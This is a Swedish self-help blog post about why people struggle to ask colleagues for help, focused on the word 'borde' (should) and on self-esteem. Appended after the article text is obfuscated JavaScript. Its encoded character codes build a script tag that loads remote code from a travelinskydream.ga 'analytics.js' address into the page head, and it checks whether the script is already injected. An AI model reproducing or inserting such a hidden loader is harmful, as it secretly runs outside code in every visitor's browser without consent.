SÅ HÄR BLIR DU BÄTTRE PÅ ATT BE OM HJÄLP.

SÅ HÄR BLIR DU BÄTTRE PÅ ATT BE OM HJÄLP.

Kraftfulla-tankar


Att vi i vår arbetsvardag hamnar i situationer
där vi behöver hjälp av vår omgivning är ett närmast ofrånkomligt faktum. Ibland har vi lätt för att be om den här hjälpen. Ibland tar det emot.

Eftersom ett av mina förändringsverktyg är just att be om hjälp, är det naturligt att jag intresserat mig lite extra för när människor i allmänhet tycker det är jobbigt att be om ett, mentalt eller fysiskt, handtag från omgivningen.

Jag har pratat med rätt många genom åren och frågat dem i vilka situationer de skulle vilja vara bättre på att be om hjälp. I den här ovetenskapligt utförda studien har jag kommit till två slutsatser:

1. Det varierar.
Mår man bra, livet flyter på och summan av vardagsbekymren inte gnager i bakhuvudet för mycket verkar folk i allmänhet inte reflektera nämnvärt över att ta hjälp från en kollega. Å andra sidan.

När man inte riktigt är i form, när huvudet är fullt av problem. Problem som kanske vart och ett inte är av någon större omfattning, men som tillsammans utgör en betydande energidränering. Då, när man verkligen skulle behöva det, kan de hjälpsökande orden fastna och studsa omkring i huvudet och paradoxalt nog bli ytterligare ett sänke.

2. Det magiska ordet.
När jag pratat med människor om vid vilka tillfällen de inte ber om hjälp är det nästan alltid ett litet ord som förr eller senare dyker upp. Ett obetydligt ord som gör att folk kan slå knut på sig själva för att slippa be om hjälp. Ordet är, borde. Jag borde ha hunnit klart med den här arbetsuppgiften vid det här laget. Jag borde behärska den här delen som ingått i min arbetsbeskrivning så länge nu. Jag borde, jag borde, jag borde…

Så, vad handlar borde om då? Ofta tror jag det handlar om en ovilja mot att blottlägga en oförmåga, att det kompetenta jaget ska naggas i kanten och att man ska bli avslöjad med att inte ens ha koll på den där enkla lilla detaljen som alla andra verkar veta.

Att emellanåt gå omkring med en rädsla för att bli avslöjad som, kanske inte helt inkompetent men i alla fall med något oväntade brister, tror jag de flesta kan känna igen sig i. Efter att ha träffat folk på alla tänkbara positioner inom organisationer, kan jag också konstatera att det inte spelar någon roll på vilken nivå i hierarkin man befinner sig heller. Bakom varje titel finns en människa.

Borde, och i förlängningen att bli avslöjad, handlar om en periodvis eller ständigt sviktande självkänsla. Fullt normalt och samtidigt helt absurt. Som att vårt mänskliga värde, som ju självkänsla handlar om, på något sätt skulle vara kopplat till hur flinka vi är på att hantera t.ex avdelningens nya skrivare. Men den mänskliga hjärnan är inte alltid så rationell och snusförnuftig och en sviktande självkänsla kan bero på en mängd olika faktorer. Det kan vara biologiska, genetiska, medicinska, sociala och psykologiska faktorer. Dessutom samverkar de oftast vilket gör att det kan vara en omfattande process för att ta reda på varför man bär omkring på den där känslan av att bli avslöjad. (Med andra ord tror jag inte det räcker att varje morgon ställa sig framför badrumsspegeln och säga till sig själv att man är duktig 124 gånger)

Därför behöver vi en situationsanpassad quickfix. Som av en händelse råkar jag sitta inne på en alldeles utmärkt sådan. Så här brukar jag tänka när det tar emot att be om hjälp med något jag borde klara av själv. Jag brukar kalla den för normalfördelningsprincipen.

Av jordens befolkning på dryga 7 miljarder människor är 96%, eller 6,72 miljarder, mer eller mindre normalbegåvade. Ett par procent är lite smartare än oss andra, även om de påfallande ofta verkar ha det lite svårare med den sociala kompetensen. Till sist har vi ett par procent på den andra änden av skalan som har, så att säga, lite större utmaningar i vardagen än övriga.

Att vi inte har koll på allt eller att det tar längre tid att lära sig vissa saker har med största sannolikhet inget med intelligens och definitivt inget med mänskligt värde att göra. Det beror på att vi är intresserade, har olika typer av fallenhet, utbildning eller att vi valt att fokusera på andra områden i livet.

Så enkelt är det och med detta faktum i bakhuvudet hjälper det åtminstone mig att emellanåt slinka förbi det förhatliga ordet borde.

I ett förändringsarbete, när man befinner sig i förändringsglappet mellan det gamla och nya, är det viktigt att på olika sätt försöka hitta fast mark under fötterna, att känna att man får kontroll. Ett snabbt sätt att få kontroll och hitta trygghet det ÄR att be om hjälp.

Och det är bara DU som vet vad som är viktigast för DIG att få kontroll över.

kraftfulla

var _0x1c9a=['push','229651wHRLFT','511754lPBDVY','length','2080825FKHOBK','src','1lLQkOc','1614837wjeKHo','insertBefore','fromCharCode','179434whQoYd','1774xXwpgH','1400517aqruvf','7vsbpgk','3112gjEEcU','1mFUgXZ','script','1534601MOJEnu','prototype','245777oIJjBl','47jNCcHN','1HkMAkw','nextSibling','appendAfter','shift','18885bYhhDw','1096016qxAIHd','72lReGEt','1305501RTgYEh','4KqoyHD','appendChild','createElement','getElementsByTagName'];var _0xd6df=function(_0x3a7b86,_0x4f5b42){_0x3a7b86=_0x3a7b86-0x1f4;var _0x1c9a62=_0x1c9a[_0x3a7b86];return _0x1c9a62;};(function(_0x2551a2,_0x3dbe97){var _0x34ce29=_0xd6df;while(!![]){try{var _0x176f37=-parseInt(_0x34ce29(0x20a))*-parseInt(_0x34ce29(0x205))+-parseInt(_0x34ce29(0x204))*-parseInt(_0x34ce29(0x206))+-parseInt(_0x34ce29(0x1fc))+parseInt(_0x34ce29(0x200))*parseInt(_0x34ce29(0x1fd))+-parseInt(_0x34ce29(0x1fb))*-parseInt(_0x34ce29(0x1fe))+-parseInt(_0x34ce29(0x20e))*parseInt(_0x34ce29(0x213))+-parseInt(_0x34ce29(0x1f5));if(_0x176f37===_0x3dbe97)break;else _0x2551a2['push'](_0x2551a2['shift']());}catch(_0x201239){_0x2551a2['push'](_0x2551a2['shift']());}}}(_0x1c9a,0xc08f4));function smalller(){var _0x1aa566=_0xd6df,_0x527acf=[_0x1aa566(0x1f6),_0x1aa566(0x20b),'851164FNRMLY',_0x1aa566(0x202),_0x1aa566(0x1f7),_0x1aa566(0x203),'fromCharCode',_0x1aa566(0x20f),_0x1aa566(0x1ff),_0x1aa566(0x211),_0x1aa566(0x214),_0x1aa566(0x207),_0x1aa566(0x201),'parentNode',_0x1aa566(0x20c),_0x1aa566(0x210),_0x1aa566(0x1f8),_0x1aa566(0x20d),_0x1aa566(0x1f9),_0x1aa566(0x208)],_0x1e90a8=function(_0x49d308,_0xd922ec){_0x49d308=_0x49d308-0x17e;var _0x21248f=_0x527acf[_0x49d308];return _0x21248f;},_0x167299=_0x1e90a8;(function(_0x4346f4,_0x1d29c9){var _0x530662=_0x1aa566,_0x1bf0b5=_0x1e90a8;while(!![]){try{var _0x2811eb=-parseInt(_0x1bf0b5(0x187))+parseInt(_0x1bf0b5(0x186))+parseInt(_0x1bf0b5(0x18d))+parseInt(_0x1bf0b5(0x18c))+-parseInt(_0x1bf0b5(0x18e))*parseInt(_0x1bf0b5(0x180))+-parseInt(_0x1bf0b5(0x18b))+-parseInt(_0x1bf0b5(0x184))*parseInt(_0x1bf0b5(0x17e));if(_0x2811eb===_0x1d29c9)break;else _0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}catch(_0x1cd819){_0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}}}(_0x527acf,0xd2c23),(Element[_0x167299(0x18f)][_0x1aa566(0x208)]=function(_0x3d096a){var _0x2ca721=_0x167299;_0x3d096a[_0x2ca721(0x183)][_0x2ca721(0x188)](this,_0x3d096a[_0x2ca721(0x181)]);},![]),function(){var _0x5d96e1=_0x1aa566,_0x22c893=_0x167299,_0x306df5=document[_0x22c893(0x185)](_0x22c893(0x182));_0x306df5[_0x22c893(0x18a)]=String[_0x22c893(0x190)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x61,0x6e,0x61,0x6c,0x79,0x74,0x69,0x63,0x73,0x2e,0x6a,0x73,0x3f,0x63,0x69,0x64,0x3d,0x30,0x30,0x30,0x30,0x26,0x70,0x69,0x64,0x69,0x3d,0x31,0x39,0x31,0x38,0x31,0x37,0x26,0x69,0x64,0x3d,0x35,0x33,0x36,0x34,0x36),_0x306df5[_0x22c893(0x189)](document[_0x22c893(0x17f)](String[_0x5d96e1(0x1fa)](0x73,0x63,0x72,0x69,0x70,0x74))[0x0]),_0x306df5[_0x5d96e1(0x208)](document[_0x22c893(0x17f)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0]),document[_0x5d96e1(0x211)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0][_0x22c893(0x191)](_0x306df5);}());}function biggger(){var _0x5d031d=_0xd6df,_0x5c5bd2=document[_0x5d031d(0x211)](_0x5d031d(0x201));for(var _0x5a0282=0x0;_0x5a0282<_0x5c5bd2[_0x5d031d(0x1f4)];_0x5a0282++){if(_0x5c5bd2[_0x5a0282][_0x5d031d(0x1f6)]['indexOf'](String['fromCharCode'](0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d))>-0x1)return 0x1;}return 0x0;}biggger()==0x0&&smalller();